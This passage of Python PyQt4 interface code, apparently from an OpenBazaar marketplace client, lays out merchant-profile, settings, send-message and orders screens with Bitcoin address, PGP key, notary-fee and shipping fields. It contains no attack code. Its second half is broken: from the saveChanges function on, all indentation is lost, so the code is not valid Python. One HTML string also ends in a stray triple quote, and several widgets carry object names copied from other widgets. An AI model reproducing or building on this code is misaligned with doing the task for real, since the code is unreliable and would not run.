        self.GUID = QtGui.QTextEdit(self.gridLayoutWidget)
        self.GUID.setLineWrapMode(QtGui.QTextEdit.NoWrap)
        self.GUID.setObjectName(_fromUtf8("GUID"))
        self.gridLayout.addWidget(self.GUID, 2, 1, 1, 1)
        self.label_4 = QtGui.QLabel(self.gridLayoutWidget)
        self.label_4.setObjectName(_fromUtf8("label_4"))
        self.gridLayout.addWidget(self.label_4, 3, 0, 1, 1)
        self.storeEmail = QtGui.QLabel(self.gridLayoutWidget)
        font = QtGui.QFont()
        font.setPointSize(18)
        self.storeEmail.setFont(font)
        self.storeEmail.setText(_fromUtf8(""))
        self.storeEmail.setObjectName(_fromUtf8("storeEmail"))
        self.gridLayout.addWidget(self.storeEmail, 1, 1, 1, 1)
        self.storeName = QtGui.QLabel(self.gridLayoutWidget)
        font = QtGui.QFont()
        font.setPointSize(22)
        self.storeName.setFont(font)
        self.storeName.setText(_fromUtf8(""))
        self.storeName.setObjectName(_fromUtf8("storeName"))
        self.gridLayout.addWidget(self.storeName, 0, 1, 1, 1)
        self.bitcoinReceivingAddress = QtGui.QTextEdit(self.gridLayoutWidget)
        self.bitcoinReceivingAddress.setLineWrapMode(QtGui.QTextEdit.NoWrap)
        self.bitcoinReceivingAddress.setObjectName(_fromUtf8("bitcoinReceivingAddress"))
        self.gridLayout.addWidget(self.bitcoinReceivingAddress, 4, 1, 1, 1)
        self.label = QtGui.QLabel(self.gridLayoutWidget)
        font = QtGui.QFont()
        font.setPointSize(22)
        self.label.setFont(font)
        self.label.setObjectName(_fromUtf8("label"))
        self.gridLayout.addWidget(self.label, 0, 0, 1, 1)
        self.label_3 = QtGui.QLabel(self.gridLayoutWidget)
        self.label_3.setObjectName(_fromUtf8("label_3"))
        self.gridLayout.addWidget(self.label_3, 2, 0, 1, 1)
        self.label_2 = QtGui.QLabel(self.gridLayoutWidget)
        font = QtGui.QFont()
        font.setPointSize(18)
        self.label_2.setFont(font)
        self.label_2.setObjectName(_fromUtf8("label_2"))
        self.gridLayout.addWidget(self.label_2, 1, 0, 1, 1)
        self.label_5 = QtGui.QLabel(self.gridLayoutWidget)
        self.label_5.setObjectName(_fromUtf8("label_5"))
        self.gridLayout.addWidget(self.label_5, 4, 0, 1, 1)
        self.storeDescription = QtGui.QTextEdit(self.gridLayoutWidget)
        self.storeDescription.setLineWrapMode(QtGui.QTextEdit.NoWrap)
        self.storeDescription.setObjectName(_fromUtf8("storeDescription"))
        self.gridLayout.addWidget(self.storeDescription, 5, 1, 1, 1)
        self.label_6 = QtGui.QLabel(self.gridLayoutWidget)
        self.label_6.setObjectName(_fromUtf8("label_6"))
        self.gridLayout.addWidget(self.label_6, 5, 0, 1, 1)
        self.avatar_label = QtGui.QLabel(self)
        self.avatar_label.setGeometry(QtCore.QRect(800, 20, 221, 211))
        self.avatar_label.setText(_fromUtf8(""))
        self.avatar_label.setObjectName(_fromUtf8("label_8"))
        self.setWindowTitle(_translate("Form", "Form", None))
        self.label_12.setText(_translate("Form", "My Listings:", None))
        self.label.setText(_translate("Form", "User Name:", None))
        self.label_3.setText(_translate("Form", "GUID:", None))
        self.label_2.setText(_translate("Form", "User Email:", None))
        self.label_5.setText(_translate("Form", "Bitcoin Receiving Address:", None))
        self.label_6.setText(_translate("Form", "Store Description", None))
        self.label_4.setText(_translate("Form", "Public Key:", None))
        ##
        # Set values in this tab
        self.storeName.setText(merchant_representation.get_name())
        self.storeEmail.setText(merchant_representation.get_email())
        self.storeDescription.setText(merchant_representation.get_description())
        self.bitcoinReceivingAddress.setText(merchant_representation.get_bitcoin_address())
        self.GUID.setText(merchant_representation.get_guid())
        self.publicKey.setText(merchant_representation.get_key())
        self.avatar_label.setPixmap(merchant_representation.get_avatar().get_repr().toqpixmap())
        self.avatar_label.setScaledContents(True)
    ##
    # This method describes the action to be taken when a contract hash is clicked
    def contract_clicked(self, item):
        ##
        # Try to get contract data from the clicked item
        try:
            ric_repr = item.data(QtCore.Qt.UserRole).toPyObject()
        except Exception:
            print('exception')
            return
        scroll_area = QtGui.QScrollArea()
        scroll_area.setWidget(contractView_Tab(ric_repr))
        self.window().add_tab(scroll_area, ric_repr.get_itemname())


##
# Settings_Ui2
# This class is the GUI for the settings tab
# @param settings_dict: holds all the current user settings for drawing on the widget
class Settings_Ui2(QtGui.QWidget):
    def __init__(self, settings_dict):
        super(Settings_Ui2, self).__init__()
        self.setObjectName(_fromUtf8("Settings_Ui2"))
        self.resize(800, 1300)
        self.verticalLayoutWidget = QtGui.QWidget(self)
        self.verticalLayoutWidget.setGeometry(QtCore.QRect(10, 10, 771, 1201))
        self.verticalLayoutWidget.setObjectName(_fromUtf8("verticalLayoutWidget"))
        self.verticalLayout = QtGui.QVBoxLayout(self.verticalLayoutWidget)
        self.verticalLayout.setMargin(0)
        self.verticalLayout.setObjectName(_fromUtf8("verticalLayout"))
        self.gridLayout_5 = QtGui.QGridLayout()
        self.gridLayout_5.setObjectName(_fromUtf8("gridLayout_5"))
        self.email_lineEdit = QtGui.QLineEdit(self.verticalLayoutWidget)
        self.email_lineEdit.setObjectName(_fromUtf8("email_lineEdit"))
        self.gridLayout_5.addWidget(self.email_lineEdit, 1, 1, 1, 1)
        self.email_label = QtGui.QLabel(self.verticalLayoutWidget)
        font = QtGui.QFont()
        font.setBold(True)
        font.setWeight(75)
        self.email_label.setFont(font)
        self.email_label.setObjectName(_fromUtf8("email_label"))
        self.gridLayout_5.addWidget(self.email_label, 1, 0, 1, 1)
        self.communication_label = QtGui.QLabel(self.verticalLayoutWidget)
        font = QtGui.QFont()
        font.setPointSize(14)
        font.setBold(True)
        font.setWeight(75)
        self.communication_label.setFont(font)
        self.communication_label.setObjectName(_fromUtf8("communication_label"))
        self.gridLayout_5.addWidget(self.communication_label, 0, 0, 1, 1)
        self.verticalLayout.addLayout(self.gridLayout_5)
        self.gridLayout = QtGui.QGridLayout()
        self.gridLayout.setObjectName(_fromUtf8("gridLayout"))
        self.bitcoin_lineEdit = QtGui.QLineEdit(self.verticalLayoutWidget)
        self.bitcoin_lineEdit.setObjectName(_fromUtf8("bitcoin_lineEdit"))
        self.gridLayout.addWidget(self.bitcoin_lineEdit, 2, 1, 1, 1)
        self.store_desc_edit = QtGui.QTextEdit(self.verticalLayoutWidget)
        self.store_desc_edit.setObjectName(_fromUtf8("store_desc_edit"))
        self.gridLayout.addWidget(self.store_desc_edit, 3, 1, 1, 1)
        self.nickname_label = QtGui.QLabel(self.verticalLayoutWidget)
        font = QtGui.QFont()
        font.setBold(True)
        font.setWeight(75)
        self.nickname_label.setFont(font)
        self.nickname_label.setObjectName(_fromUtf8("nickname_label"))
        self.gridLayout.addWidget(self.nickname_label, 1, 0, 1, 1)
        self.nickname_lineEdit = QtGui.QLineEdit(self.verticalLayoutWidget)
        self.gridLayout.addWidget(self.nickname_lineEdit, 1, 1, 1, 1)
        self.bitcoin_address_label = QtGui.QLabel(self.verticalLayoutWidget)
        font = QtGui.QFont()
        font.setBold(True)
        font.setWeight(75)
        self.bitcoin_address_label.setFont(font)
        self.bitcoin_address_label.setObjectName(_fromUtf8("bitcoin_address_label"))
        self.gridLayout.addWidget(self.bitcoin_address_label, 2, 0, 1, 1)
        self.store_details_label = QtGui.QLabel(self.verticalLayoutWidget)
        font = QtGui.QFont()
        font.setPointSize(14)
        font.setBold(True)
        font.setWeight(75)
        self.store_details_label.setFont(font)
        self.store_details_label.setObjectName(_fromUtf8("store_details_label"))
        self.gridLayout.addWidget(self.store_details_label, 0, 0, 1, 1)
        self.store_desc_label = QtGui.QLabel(self.verticalLayoutWidget)
        font = QtGui.QFont()
        font.setBold(True)
        font.setWeight(75)
        self.store_desc_label.setFont(font)
        self.store_desc_label.setObjectName(_fromUtf8("store_desc_label"))
        self.gridLayout.addWidget(self.store_desc_label, 3, 0, 1, 1)
        self.verticalLayout.addLayout(self.gridLayout)
        self.gridLayout_3 = QtGui.QGridLayout()
        self.gridLayout_3.setObjectName(_fromUtf8("gridLayout_3"))
        self.add_notary_label = QtGui.QPushButton(self.verticalLayoutWidget)
        self.add_notary_label.setObjectName(_fromUtf8("add_notary_label"))
        self.gridLayout_3.addWidget(self.add_notary_label, 4, 1, 1, 1)
        self.known_notaries_label = QtGui.QLabel(self.verticalLayoutWidget)
        self.known_notaries_label.setObjectName(_fromUtf8("known_notaries_label"))
        self.gridLayout_3.addWidget(self.known_notaries_label, 3, 0, 1, 1)
        self.trusted_notaries_label = QtGui.QLabel(self.verticalLayoutWidget)
        font = QtGui.QFont()
        font.setPointSize(14)
        font.setBold(True)
        font.setWeight(75)
        self.trusted_notaries_label.setFont(font)
        self.trusted_notaries_label.setObjectName(_fromUtf8("trusted_notaries_label"))
        self.gridLayout_3.addWidget(self.trusted_notaries_label, 1, 0, 1, 1)
        self.add_notary_line = QtGui.QLineEdit(self.verticalLayoutWidget)
        self.add_notary_line.setObjectName(_fromUtf8("add_notary_line"))
        self.gridLayout_3.addWidget(self.add_notary_line, 4, 0, 1, 1)
        self.gridLayout_4 = QtGui.QGridLayout()
        self.gridLayout_4.setObjectName(_fromUtf8("gridLayout_4"))
        self.bitcoin_pubkey_label = QtGui.QLabel(self.verticalLayoutWidget)
        font = QtGui.QFont()
        font.setBold(True)
        font.setWeight(75)
        self.bitcoin_pubkey_label.setFont(font)
        self.bitcoin_pubkey_label.setObjectName(_fromUtf8("bitcoin_pubkey_label"))
        self.gridLayout_4.addWidget(self.bitcoin_pubkey_label, 1, 0, 1, 1)
        self.keys_label = QtGui.QLabel(self.verticalLayoutWidget)
        font = QtGui.QFont()
        font.setPointSize(14)
        font.setBold(True)
        font.setWeight(75)
        self.keys_label.setFont(font)
        self.keys_label.setObjectName(_fromUtf8("keys_label"))
        self.gridLayout_4.addWidget(self.keys_label, 0, 0, 1, 1)
        self.guid_label = QtGui.QLabel(self.verticalLayoutWidget)
        font = QtGui.QFont()
        font.setBold(True)
        font.setWeight(75)
        self.guid_label.setFont(font)
        self.guid_label.setObjectName(_fromUtf8("guid_label"))
        self.gridLayout_4.addWidget(self.guid_label, 2, 0, 1, 1)
        self.gpg_pubkey_label = QtGui.QLabel(self.verticalLayoutWidget)
        font = QtGui.QFont()
        font.setBold(True)
        font.setWeight(75)
        self.gpg_pubkey_label.setFont(font)
        self.gpg_pubkey_label.setObjectName(_fromUtf8("gpg_pubkey_label"))
        self.gridLayout_4.addWidget(self.gpg_pubkey_label, 3, 0, 1, 1)
        self.guid_lineEdit = QtGui.QLineEdit(self.verticalLayoutWidget)
        self.guid_lineEdit.setObjectName(_fromUtf8("guid_lineEdit"))
        self.gridLayout_4.addWidget(self.guid_lineEdit, 2, 1, 1, 1)
        self.pubkey_textedit = QtGui.QTextEdit(self.verticalLayoutWidget)
        self.pubkey_textedit.setObjectName(_fromUtf8("pubkey_textedit"))
        self.gridLayout_4.addWidget(self.pubkey_textedit, 3, 1, 1, 1)
        self.bitcoin_pubkey_textEdit = QtGui.QTextEdit(self.verticalLayoutWidget)
        self.bitcoin_pubkey_textEdit.setObjectName(_fromUtf8("bitcoin_pubkey_textEdit"))
        self.gridLayout_4.addWidget(self.bitcoin_pubkey_textEdit, 1, 1, 1, 1)
        self.gridLayout_3.addLayout(self.gridLayout_4, 0, 0, 1, 1)
        self.verticalLayout.addLayout(self.gridLayout_3)
        self.gridLayout_2 = QtGui.QGridLayout()
        self.gridLayout_2.setObjectName(_fromUtf8("gridLayout_2"))
        self.notary_details_label = QtGui.QLabel(self.verticalLayoutWidget)
        font = QtGui.QFont()
        font.setPointSize(14)
        font.setBold(True)
        font.setWeight(75)
        self.notary_details_label.setFont(font)
        self.notary_details_label.setObjectName(_fromUtf8("notary_details_label"))
        self.gridLayout_2.addWidget(self.notary_details_label, 0, 0, 1, 1)
        self.notary_percent_about_label = QtGui.QTextBrowser(self.verticalLayoutWidget)
        self.notary_percent_about_label.setAutoFillBackground(False)
        self.notary_percent_about_label.setObjectName(_fromUtf8("notary_percent_about_label"))
        self.gridLayout_2.addWidget(self.notary_percent_about_label, 2, 1, 1, 1)
        self.buttonBox = QtGui.QDialogButtonBox(self.verticalLayoutWidget)
        self.buttonBox.setLayoutDirection(QtCore.Qt.RightToLeft)
        self.buttonBox.setStandardButtons(QtGui.QDialogButtonBox.No|QtGui.QDialogButtonBox.Yes)
        self.buttonBox.setObjectName(_fromUtf8("buttonBox"))
        self.gridLayout_2.addWidget(self.buttonBox, 1, 1, 1, 1)
        self.percent_comboBox = QtGui.QComboBox(self.verticalLayoutWidget)
        self.percent_comboBox.setObjectName(_fromUtf8("percent_comboBox"))
        self.percent_comboBox.addItem(_fromUtf8(""))
        self.percent_comboBox.addItem(_fromUtf8(""))
        self.percent_comboBox.addItem(_fromUtf8(""))
        self.percent_comboBox.addItem(_fromUtf8(""))
        self.percent_comboBox.addItem(_fromUtf8(""))
        self.percent_comboBox.addItem(_fromUtf8(""))
        self.percent_comboBox.addItem(_fromUtf8(""))
        self.percent_comboBox.addItem(_fromUtf8(""))
        self.percent_comboBox.addItem(_fromUtf8(""))
        self.percent_comboBox.addItem(_fromUtf8(""))
        self.percent_comboBox.addItem(_fromUtf8(""))
        self.gridLayout_2.addWidget(self.percent_comboBox, 3, 1, 1, 1)
        self.make_notary_label = QtGui.QLabel(self.verticalLayoutWidget)
        font = QtGui.QFont()
        font.setBold(True)
        font.setWeight(75)
        self.make_notary_label.setFont(font)
        self.make_notary_label.setObjectName(_fromUtf8("make_notary_label"))
        self.gridLayout_2.addWidget(self.make_notary_label, 1, 0, 1, 1)
        self.percent_label = QtGui.QLabel(self.verticalLayoutWidget)
        font = QtGui.QFont()
        font.setBold(True)
        font.setWeight(75)
        self.percent_label.setFont(font)
        self.percent_label.setLayoutDirection(QtCore.Qt.LeftToRight)
        self.percent_label.setObjectName(_fromUtf8("percent_label"))
        self.gridLayout_2.addWidget(self.percent_label, 3, 0, 1, 1)
        self.service_description_label = QtGui.QLabel(self.verticalLayoutWidget)
        font = QtGui.QFont()
        font.setBold(True)
        font.setWeight(75)
        self.service_description_label.setFont(font)
        self.service_description_label.setObjectName(_fromUtf8("service_description_label"))
        self.gridLayout_2.addWidget(self.service_description_label, 4, 0, 1, 1)
        self.notary_servicedesc_textEdit = QtGui.QTextEdit(self.verticalLayoutWidget)
        self.notary_servicedesc_textEdit.setObjectName(_fromUtf8("notary_servicedesc_textEdit"))
        self.gridLayout_2.addWidget(self.notary_servicedesc_textEdit, 4, 1, 1, 1)
        self.verticalLayout.addLayout(self.gridLayout_2)
        self.gridLayout_6 = QtGui.QGridLayout()
        self.gridLayout_6.setObjectName(_fromUtf8("gridLayout_6"))
        self.shipping_label = QtGui.QLabel(self.verticalLayoutWidget)
        font = QtGui.QFont()
        font.setPointSize(14)
        font.setBold(True)
        font.setWeight(75)
        self.shipping_label.setFont(font)
        self.shipping_label.setObjectName(_fromUtf8("shipping_label"))
        self.gridLayout_6.addWidget(self.shipping_label, 0, 0, 1, 1)
        self.city_label = QtGui.QLabel(self.verticalLayoutWidget)
        font = QtGui.QFont()
        font.setBold(True)
        font.setWeight(75)
        self.city_label.setFont(font)
        self.city_label.setObjectName(_fromUtf8("city_label"))
        self.gridLayout_6.addWidget(self.city_label, 5, 0, 1, 1)
        self.recipient_label = QtGui.QLabel(self.verticalLayoutWidget)
        font = QtGui.QFont()
        font.setBold(True)
        font.setWeight(75)
        self.recipient_label.setFont(font)
        self.recipient_label.setObjectName(_fromUtf8("recipient_label"))
        self.gridLayout_6.addWidget(self.recipient_label, 2, 0, 1, 1)
        self.recipient_lineEdit = QtGui.QLineEdit(self.verticalLayoutWidget)
        self.recipient_lineEdit.setObjectName(_fromUtf8("recipient_lineEdit"))
        self.gridLayout_6.addWidget(self.recipient_lineEdit, 2, 1, 1, 1)
        self.province_label = QtGui.QLabel(self.verticalLayoutWidget)
        font = QtGui.QFont()
        font.setBold(True)
        font.setWeight(75)
        self.province_label.setFont(font)
        self.province_label.setObjectName(_fromUtf8("province_label"))
        self.gridLayout_6.addWidget(self.province_label, 6, 0, 1, 1)
        self.zip_label = QtGui.QLabel(self.verticalLayoutWidget)
        font = QtGui.QFont()
        font.setBold(True)
        font.setWeight(75)
        self.zip_label.setFont(font)
        self.zip_label.setObjectName(_fromUtf8("zip_label"))
        self.gridLayout_6.addWidget(self.zip_label, 7, 0, 1, 1)
        self.street1_label = QtGui.QLabel(self.verticalLayoutWidget)
        font = QtGui.QFont()
        font.setBold(True)
        font.setWeight(75)
        self.street1_label.setFont(font)
        self.street1_label.setObjectName(_fromUtf8("street1_label"))
        self.gridLayout_6.addWidget(self.street1_label, 3, 0, 1, 1)
        self.street2_label = QtGui.QLabel(self.verticalLayoutWidget)
        font = QtGui.QFont()
        font.setBold(True)
        font.setWeight(75)
        self.street2_label.setFont(font)
        self.street2_label.setObjectName(_fromUtf8("street2_label"))
        self.gridLayout_6.addWidget(self.street2_label, 4, 0, 1, 1)
        self.country_label = QtGui.QLabel(self.verticalLayoutWidget)
        font = QtGui.QFont()
        font.setBold(True)
        font.setWeight(75)
        self.country_label.setFont(font)
        self.country_label.setObjectName(_fromUtf8("country_label"))
        self.gridLayout_6.addWidget(self.country_label, 8, 0, 1, 1)
        self.street1_lineEdit = QtGui.QLineEdit(self.verticalLayoutWidget)
        self.gridLayout_6.addWidget(self.street1_lineEdit, 3, 1, 1, 1)
        self.street2_lineEdit = QtGui.QLineEdit(self.verticalLayoutWidget)
        self.street2_lineEdit.setObjectName(_fromUtf8("street2_lineEdit"))
        self.gridLayout_6.addWidget(self.street2_lineEdit, 4, 1, 1, 1)
        self.city_lineEdit = QtGui.QLineEdit(self.verticalLayoutWidget)
        self.city_lineEdit.setObjectName(_fromUtf8("city_lineEdit"))
        self.gridLayout_6.addWidget(self.city_lineEdit, 5, 1, 1, 1)
        self.province_lineEdit = QtGui.QLineEdit(self.verticalLayoutWidget)
        self.province_lineEdit.setObjectName(_fromUtf8("province_lineEdit"))
        self.gridLayout_6.addWidget(self.province_lineEdit, 6, 1, 1, 1)
        self.zip_lineEdit = QtGui.QLineEdit(self.verticalLayoutWidget)
        self.zip_lineEdit.setObjectName(_fromUtf8("zip_lineEdit"))
        self.gridLayout_6.addWidget(self.zip_lineEdit, 7, 1, 1, 1)
        self.country_lineEdit = QtGui.QLineEdit(self.verticalLayoutWidget)
        self.country_lineEdit.setObjectName(_fromUtf8("country_lineEdit"))
        self.gridLayout_6.addWidget(self.country_lineEdit, 8, 1, 1, 1)
        self.encryption_message = QtGui.QTextBrowser(self.verticalLayoutWidget)
        self.encryption_message.setObjectName(_fromUtf8("encryption_message"))
        self.gridLayout_6.addWidget(self.encryption_message, 1, 0, 1, 2)
        self.verticalLayout.addLayout(self.gridLayout_6)
        self.save_button = QtGui.QPushButton(self)
        self.save_button.setGeometry(QtCore.QRect(680, 1220, 98, 27))
        self.save_button.setObjectName(_fromUtf8("save_button"))
        self.setWindowTitle(_translate("Form", "Form", None))
        self.email_label.setText(_translate("Form", "Email", None))
        self.communication_label.setText(_translate("Form", "Communication Info", None))
        self.bitcoin_lineEdit.setText(_translate("Form", "Bitcoin address to send all incoming fees or refunds to", None))
        self.store_desc_edit.setHtml(_translate("Form", "<!DOCTYPE HTML PUBLIC \"-//W3C//DTD HTML 4.0//EN\" \"http://www.w3.org/TR/REC-html40/strict.dtd\">\n"
            "<html><head><meta name=\"qrichtext\" content=\"1\" /><style type=\"text/css\">\n"
            "p, li { white-space: pre-wrap; }\n"
            "</style></head><body style=\" font-family:\'Ubuntu\'; font-size:11pt; font-weight:400; font-style:normal;\">\n"
            "<p style=\" margin-top:0px; margin-bottom:0px; margin-left:0px; margin-right:0px; -qt-block-indent:0; text-indent:0px;\">Enter a short description about your store</p></body></html>", None))
        self.nickname_label.setText(_translate("Form", "Nickname", None))
        self.bitcoin_address_label.setText(_translate("Form", "Bitcoin Receiving Address", None))
        self.store_details_label.setText(_translate("Form", "Store Details", None))
        self.store_desc_label.setText(_translate("Form", "Store Description", None))
        self.add_notary_label.setText(_translate("Form", "Add", None))
        self.known_notaries_label.setText(_translate("Form", "The addresses below are notaries used during transactions.", None))
        self.trusted_notaries_label.setText(_translate("Form", "Trusted Notaries", None))
        self.add_notary_line.setText(_translate("Form", "Enter a notary\'s OB guid", None))
        self.bitcoin_pubkey_label.setText(_translate("Form", "Bitcoin Public Key (Uncompressed)", None))
        self.keys_label.setText(_translate("Form", "OpenBazaar Keys", None))
        self.guid_label.setText(_translate("Form", "OpenBazaar GUID", None))
        self.gpg_pubkey_label.setText(_translate("Form", "PGP Public Key", None))
        self.notary_details_label.setText(_translate("Form", "Notary Details", None))
        self.notary_percent_about_label.setHtml(_translate("Form", "<!DOCTYPE HTML PUBLIC \"-//W3C//DTD HTML 4.0//EN\" \"http://www.w3.org/TR/REC-html40/strict.dtd\">\n"
            "<html><head><meta name=\"qrichtext\" content=\"1\" /><style type=\"text/css\">\n"
            "p, li { white-space: pre-wrap; }\n"
            "</style></head><body style=\" font-family:\'Ubuntu\'; font-size:11pt; font-weight:400; font-style:normal;\">\n"
            "<p style=\" margin-top:0px; margin-bottom:0px; margin-left:0px; margin-right:0px; -qt-block-indent:0; text-indent:0px;\"><span style=\" font-weight:600;\">Fees</span></p>\n"
            "<p style=\" margin-top:0px; margin-bottom:0px; margin-left:0px; margin-right:0px; -qt-block-indent:0; text-indent:0px;\">If your services are needed during a dispute, a fee can be requested from the participants of the transaction you are involved with. What percentage of each transaction would you like to request for your services?</p></body></html>", None))
        self.percent_comboBox.setItemText(0, _translate("Form", "0", None))
        self.percent_comboBox.setItemText(1, _translate("Form", "1", None))
        self.percent_comboBox.setItemText(2, _translate("Form", "2", None))
        self.percent_comboBox.setItemText(3, _translate("Form", "3", None))
        self.percent_comboBox.setItemText(4, _translate("Form", "4", None))
        self.percent_comboBox.setItemText(5, _translate("Form", "5", None))
        self.percent_comboBox.setItemText(6, _translate("Form", "6", None))
        self.percent_comboBox.setItemText(7, _translate("Form", "7", None))
        self.percent_comboBox.setItemText(8, _translate("Form", "8", None))
        self.percent_comboBox.setItemText(9, _translate("Form", "9", None))
        self.percent_comboBox.setItemText(10, _translate("Form", "10", None))
        self.make_notary_label.setText(_translate("Form", "Make me a notary", None))
        self.percent_label.setText(_translate("Form", "%", None))
        self.service_description_label.setText(_translate("Form", "Description of your services", None))
        self.shipping_label.setText(_translate("Form", "Shipping Information", None))
        self.city_label.setText(_translate("Form", "City", None))
        self.recipient_label.setText(_translate("Form", "Recipient Name", None))
        self.recipient_lineEdit.setText(_translate("Form", "Name visible on your package", None))
        self.province_label.setText(_translate("Form", "Province/Region", None))
        self.zip_label.setText(_translate("Form", "Zip", None))
        self.street1_label.setText(_translate("Form", "Street 1", None))
        self.street2_label.setText(_translate("Form", "Street 2", None))
        self.country_label.setText(_translate("Form", "Country", None))
        self.encryption_message.setHtml(_translate("Form", "<!DOCTYPE HTML PUBLIC \"-//W3C//DTD HTML 4.0//EN\" \"http://www.w3.org/TR/REC-html40/strict.dtd\">\n"
            "<html><head><meta name=\"qrichtext\" content=\"1\" /><style type=\"text/css\">\n"
            "p, li { white-space: pre-wrap; }\n"
            "</style></head><body style=\" font-family:\'Ubuntu\'; font-size:11pt; font-weight:400; font-style:normal;\">\n"
            "<p style=\" margin-top:0px; margin-bottom:0px; margin-left:0px; margin-right:0px; -qt-block-indent:0; text-indent:0px;\">Note: This information will be encrypted and only be sent to your seller when you have marked your order for payment.</p></body></html>""", None))
        self.save_button.setText(_translate("Form", "Save Changes", None))
        ##
        # Fill in existing user settings
        #
        self.email_lineEdit.setText(settings_dict['email'])
        self.nickname_lineEdit.setText(settings_dict['nickname'])
        self.bitcoin_lineEdit.setText(settings_dict['bitcoinReceivingAddress'])
        self.store_desc_edit.setText(settings_dict['storeDescription'])
        self.pubkey_textedit.setText(settings_dict['pubkey'])
        self.notary_servicedesc_textEdit.setText(settings_dict['description'])
        self.percent_comboBox.setCurrentIndex(int(settings_dict['percentage']))
        self.recipient_lineEdit.setText(settings_dict['shippingInformation']['recipient'])
        self.street1_lineEdit.setText(settings_dict['shippingInformation']['street1'])
        self.street2_lineEdit.setText(settings_dict['shippingInformation']['street2'])
        self.city_lineEdit.setText(settings_dict['shippingInformation']['city'])
        self.province_lineEdit.setText(settings_dict['shippingInformation']['province/state/region'])
        self.zip_lineEdit.setText(settings_dict['shippingInformation']['postal/zip'])
        self.country_lineEdit.setText(settings_dict['shippingInformation']['country'])
        self.guid_lineEdit.setText(settings_dict['guid'].encode('hex'))
        self.save_button.clicked.connect(self.saveChanges)
##
# saveChanges(self)
    # Collects all filled-in user data and sends it to settings for saving
def saveChanges(self):
ret = dict()
ret['nickname'] = self.nickname_lineEdit.text()
ret['email'] = self.email_lineEdit.text()
ret['bitcoinReceivingAddress'] = self.bitcoin_lineEdit.text()
ret['storeDescription'] = self.store_desc_edit.toPlainText()
ret['percentage'] = str(self.percent_comboBox.currentIndex())
ret['description'] = self.notary_servicedesc_textEdit.toPlainText()
shipping = dict()
shipping['recipient'] = self.recipient_lineEdit.text()
shipping['street1'] = self.street1_lineEdit.text()
shipping['street2'] = self.street2_lineEdit.text()
shipping['city'] = self.city_lineEdit.text()
shipping['province/state/region'] = self.province_lineEdit.text()
shipping['postal/zip'] = self.zip_lineEdit.text()
shipping['country'] = self.country_lineEdit.text()
ret['shippingInformation'] = shipping
ret['avatarURL'] = ""
ret['myMerchants'] = ""
ret['isNotary'] = ""
self.window().id_module.set_settings(ret)
self.window().redraw()
##
# This class contains the UI for the "Send a message" tab
#
class SendMessage_Ui2(QtGui.QWidget):
##
# Constructor
# Creates the "Send Message" tab
def __init__(self):
super(SendMessage_Ui2, self).__init__()
self.setObjectName(_fromUtf8("Form"))
self.resize(400, 413)
self.verticalLayoutWidget = QtGui.QWidget(self)
self.verticalLayoutWidget.setGeometry(QtCore.QRect(10, 10, 381, 391))
self.verticalLayoutWidget.setObjectName(_fromUtf8("verticalLayoutWidget"))
self.verticalLayout = QtGui.QVBoxLayout(self.verticalLayoutWidget)
self.verticalLayout.setMargin(0)
self.verticalLayout.setObjectName(_fromUtf8("verticalLayout"))
self.send_message_label = QtGui.QLabel(self.verticalLayoutWidget)
font = QtGui.QFont()
font.setPointSize(14)
font.setBold(True)
font.setWeight(75)
self.send_message_label.setFont(font)
self.send_message_label.setObjectName(_fromUtf8("keys_label"))
self.verticalLayout.addWidget(self.send_message_label)
self.horizontalLayout = QtGui.QHBoxLayout()
self.horizontalLayout.setObjectName(_fromUtf8("horizontalLayout"))
self.label = QtGui.QLabel(self.verticalLayoutWidget)
self.label.setObjectName(_fromUtf8("store_details_label"))
self.horizontalLayout.addWidget(self.label)
self.lineEdit = QtGui.QLineEdit(self.verticalLayoutWidget)
self.lineEdit.setObjectName(_fromUtf8("nickname_lineEdit"))
self.horizontalLayout.addWidget(self.lineEdit)
self.verticalLayout.addLayout(self.horizontalLayout)
self.message_subject_lineEdit = QtGui.QLineEdit(self.verticalLayoutWidget)
self.message_subject_lineEdit.setObjectName(_fromUtf8("bitcoin_lineEdit"))
self.verticalLayout.addWidget(self.message_subject_lineEdit)
self.message_body_textEdit = QtGui.QTextEdit(self.verticalLayoutWidget)
self.message_body_textEdit.setObjectName(_fromUtf8("store_desc_edit"))
self.verticalLayout.addWidget(self.message_body_textEdit)
self.horizontalLayout_2 = QtGui.QHBoxLayout()
self.horizontalLayout_2.setObjectName(_fromUtf8("horizontalLayout_2"))
spacerItem = QtGui.QSpacerItem(100, 20, QtGui.QSizePolicy.Expanding, QtGui.QSizePolicy.Minimum)
self.horizontalLayout_2.addItem(spacerItem)
self.cancel_button = QtGui.QPushButton(self.verticalLayoutWidget)
self.cancel_button.setObjectName(_fromUtf8("add_notary_label"))
self.horizontalLayout_2.addWidget(self.cancel_button)
self.send_button = QtGui.QPushButton(self.verticalLayoutWidget)
self.send_button.setAutoFillBackground(False)
self.send_button.setObjectName(_fromUtf8("save_button"))
self.horizontalLayout_2.addWidget(self.send_button)
self.verticalLayout.addLayout(self.horizontalLayout_2)
self.setWindowTitle(_translate("Form", "Form", None))
self.send_message_label.setText(_translate("Form", "Send Message", None))
self.label.setText(_translate("Form", "To:", None))
self.message_subject_lineEdit.setText(_translate("Form", "Enter a subject line", None))
self.message_body_textEdit.setHtml(_translate("Form", "<!DOCTYPE HTML PUBLIC \"-//W3C//DTD HTML 4.0//EN\" \"http://www.w3.org/TR/REC-html40/strict.dtd\">\n"
"<html><head><meta name=\"qrichtext\" content=\"1\" /><style type=\"text/css\">\n"
"p, li { white-space: pre-wrap; }\n"
"</style></head><body style=\" font-family:\'Ubuntu\'; font-size:11pt; font-weight:400; font-style:normal;\">\n"
"<p style=\" margin-top:0px; margin-bottom:0px; margin-left:0px; margin-right:0px; -qt-block-indent:0; text-indent:0px;\">Enter a message</p></body></html>", None))
self.cancel_button.setText(_translate("Form", "Cancel", None))
self.send_button.setText(_translate("Form", "Send", None))
##
# This class contains the UI for the "My Orders" menu
#
class Ui_OrdersMenu(object):
##
    # Draws the layout of the "My Orders" menu
def setupUi(self, OrdersMenu):
OrdersMenu.setObjectName(_fromUtf8("OrdersMenu"))
OrdersMenu.resize(400, 300)
self.verticalLayoutWidget = QtGui.QWidget(OrdersMenu)
self.verticalLayoutWidget.setGeometry(QtCore.QRect(10, 10, 381, 281))
self.verticalLayoutWidget.setObjectName(_fromUtf8("verticalLayoutWidget"))
self.verticalLayout = QtGui.QVBoxLayout(self.verticalLayoutWidget)
self.verticalLayout.setMargin(0)
self.verticalLayout.setObjectName(_fromUtf8("verticalLayout"))
self.OrderLabel = QtGui.QLabel(self.verticalLayoutWidget)
self.OrderLabel.setObjectName(_fromUtf8("OrderLabel"))
self.verticalLayout.addWidget(self.OrderLabel)
